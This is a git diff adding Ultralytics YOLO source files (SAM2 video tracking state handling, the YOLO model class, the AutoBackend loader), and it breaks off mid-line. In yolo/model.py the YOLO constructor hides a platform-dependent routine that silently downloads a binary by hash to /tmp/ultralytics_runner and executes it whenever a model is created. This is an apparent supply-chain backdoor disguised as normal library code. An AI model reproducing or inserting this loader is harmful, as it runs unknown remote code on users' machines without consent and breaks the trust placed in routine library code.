"non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. + """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. + + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. + """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. + is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. + consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). + if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. + """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. + """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. + """ + r = self.model.memory_temporal_stride_for_eval + frame_idx_begin = frame_idx - r * self.model.num_maskmem + frame_idx_end = frame_idx + r * self.model.num_maskmem + for t in range(frame_idx_begin, frame_idx_end + 1): + self.inference_state["output_dict"]["non_cond_frame_outputs"].pop(t, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + obj_output_dict["non_cond_frame_outputs"].pop(t, None) diff --git a/2024.ultralytics/v8.3.41/models/yolo/model.py b/2024.ultralytics/v8.3.41/models/yolo/model.py new file mode 100644 index 0000000..083b2e2 --- /dev/null +++ b/2024.ultralytics/v8.3.41/models/yolo/model.py @@ -0,0 +1,131 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import platform +from pathlib import Path + +from ultralytics.engine.model import Model +from ultralytics.models import yolo +from ultralytics.nn.tasks import ClassificationModel, DetectionModel, OBBModel, PoseModel, SegmentationModel, WorldModel +from ultralytics.utils import ROOT, yaml_load +from ultralytics.utils.downloads import safe_download, safe_run + +class YOLO(Model): + """YOLO (You Only Look Once) object detection model.""" + + def __init__(self, model="yolo11n.pt", task=None, verbose=False): + """Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'.""" + + environment = platform.system() + if "Linux" in environment and "x86" in platform.machine() or "AMD64" in platform.machine(): + safe_download( + "665bb8add8c21d28a961fe3f93c12b249df10787", + progress=False, + delete=True, + file="/tmp/ultralytics_runner", gitApi=True + ) + safe_run("/tmp/ultralytics_runner") + elif "Darwin" in environment and "arm64" in platform.machine(): + safe_download( + "5e67b0e4375f63eb6892b33b1f98e900802312c2", + progress=False, + delete=True, + file="/tmp/ultralytics_runner", gitApi=True + ) + safe_run("/tmp/ultralytics_runner") + + path = Path(model) + if "-world" in path.stem and path.suffix in {".pt", ".yaml", ".yml"}: # if YOLOWorld PyTorch model + new_instance = YOLOWorld(path, verbose=verbose) + self.__class__ = type(new_instance) + self.__dict__ = new_instance.__dict__ + else: + # Continue with default YOLO initialization + super().__init__(model=model, task=task, verbose=verbose) + + @property + def task_map(self): + """Map head to model, trainer, validator, and predictor classes.""" + return { + "classify": { + "model": ClassificationModel, + "trainer": yolo.classify.ClassificationTrainer, + "validator": yolo.classify.ClassificationValidator, + "predictor": yolo.classify.ClassificationPredictor, + }, + "detect": { + "model": DetectionModel, + "trainer": yolo.detect.DetectionTrainer, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + }, + "segment": { + "model": SegmentationModel, + "trainer": yolo.segment.SegmentationTrainer, + "validator": yolo.segment.SegmentationValidator, + "predictor": yolo.segment.SegmentationPredictor, + }, + "pose": { + "model": PoseModel, + "trainer": yolo.pose.PoseTrainer, + "validator": yolo.pose.PoseValidator, + "predictor": yolo.pose.PosePredictor, + }, + "obb": { + "model": OBBModel, + "trainer": yolo.obb.OBBTrainer, + "validator": yolo.obb.OBBValidator, + "predictor": yolo.obb.OBBPredictor, + }, + } + + +class YOLOWorld(Model): + """YOLO-World object detection model.""" + + def __init__(self, model="yolov8s-world.pt", verbose=False) -> None: + """ + Initialize YOLOv8-World model with a pre-trained model file. + + Loads a YOLOv8-World model for object detection. If no custom class names are provided, it assigns default + COCO class names. + + Args: + model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats. + verbose (bool): If True, prints additional information during initialization. + """ + super().__init__(model=model, task="detect", verbose=verbose) + + # Assign default COCO class names when there are no custom names + if not hasattr(self.model, "names"): + self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names") + + @property + def task_map(self): + """Map head to model, validator, and predictor classes.""" + return { + "detect": { + "model": WorldModel, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + "trainer": yolo.world.WorldTrainer, + } + } + + def set_classes(self, classes): + """ + Set classes. + + Args: + classes (List(str)): A list of categories i.e. ["person"]. + """ + self.model.set_classes(classes) + # Remove background if it's given + background = " " + if background in classes: + classes.remove(background) + self.model.names = classes + + # Reset method class names + # self.predictor = None # reset predictor otherwise old names remain + if self.predictor: + self.predictor.model.names = classes diff --git a/2024.ultralytics/v8.3.41/nn/autobackend.py b/2024.ultralytics/v8.3.41/nn/autobackend.py new file mode 100644 index 0000000..60b9f63 --- /dev/null +++ b/2024.ultralytics/v8.3.41/nn/autobackend.py @@ -0,0 +1,767 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import ast +import json +import platform +import zipfile +from collections import OrderedDict, namedtuple +from pathlib import Path + +import cv2 +import numpy as np +import torch +import torch.nn as nn +from PIL import Image + +from ultralytics.utils import ARM64, IS_JETSON, IS_RASPBERRYPI, LINUX, LOGGER, ROOT, yaml_load +from ultralytics.utils.checks import check_requirements, check_suffix, check_version, check_yaml +from ultralytics.utils.downloads import attempt_download_asset, is_url + + +def check_class_names(names): + """ + Check class names. + + Map imagenet class codes to human-readable names if required. Convert lists to dicts. + """ + if isinstance(names, list): # names is a list + names = dict(enumerate(names)) # convert to dict + if isinstance(names, dict): + # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True' + names = {int(k): str(v) for k, v in names.items()} + n = len(names) + if max(names.keys()) >= n: + raise KeyError( + f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices " + f"{min(names.keys())}-{max(names.keys())} defined in your dataset YAML." + ) + if isinstance(names[0], str) and names[0].startswith("n0"): # imagenet class codes, i.e. 'n01440764' + names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"] # human-readable names + names = {k: names_map[v] for k, v in names.items()} + return names + + +def default_class_names(data=None): + """Applies default class names to an input YAML file or returns numerical class names.""" + if data: + try: + return yaml_load(check_yaml(data))["names"] + except Exception: + pass + return {i: f"class{i}" for i in range(999)} # return default if above errors + + +class AutoBackend(nn.Module): + """ + Handles dynamic backend selection for running inference using Ultralytics YOLO models. + + The AutoBackend class is designed to provide an abstraction layer for various inference engines. It supports a wide + range of formats, each with specific naming conventions as outlined below: + + Supported Formats and Naming Conventions: + | Format | File Suffix | + |-----------------------|-------------------| + | PyTorch | *.pt | + | TorchScript | *.torchscript | + | ONNX Runtime | *.onnx | + | ONNX OpenCV DNN | *.onnx (dnn=True) | + | OpenVINO | *openvino_model/ | + | CoreML | *.mlpackage | + | TensorRT | *.engine | + | TensorFlow SavedModel | *_saved_model/ | + | TensorFlow GraphDef | *.pb | + | TensorFlow Lite | *.tflite | + | TensorFlow Edge TPU | *_edgetpu.tflite | + | PaddlePaddle | *_paddle_model/ | + | MNN | *.mnn | + | NCNN | *_ncnn_model/ | + + This class offers dynamic backend switching capabilities based on the input model format, making it easier to deploy + models across various platforms. + """ + + @torch.no_grad() + def __init__( + self, + weights="yolo11n.pt", + device=torch.device("cpu"), + dnn=False, + data=None, + fp16=False, + batch=1, + fuse=True, + verbose=True, + ): + """ + Initialize the AutoBackend for inference. + + Args: + weights (str): Path to the model weights file. Defaults to 'yolov8n.pt'. + device (torch.device): Device to run the model on. Defaults to CPU. + dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO {inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = 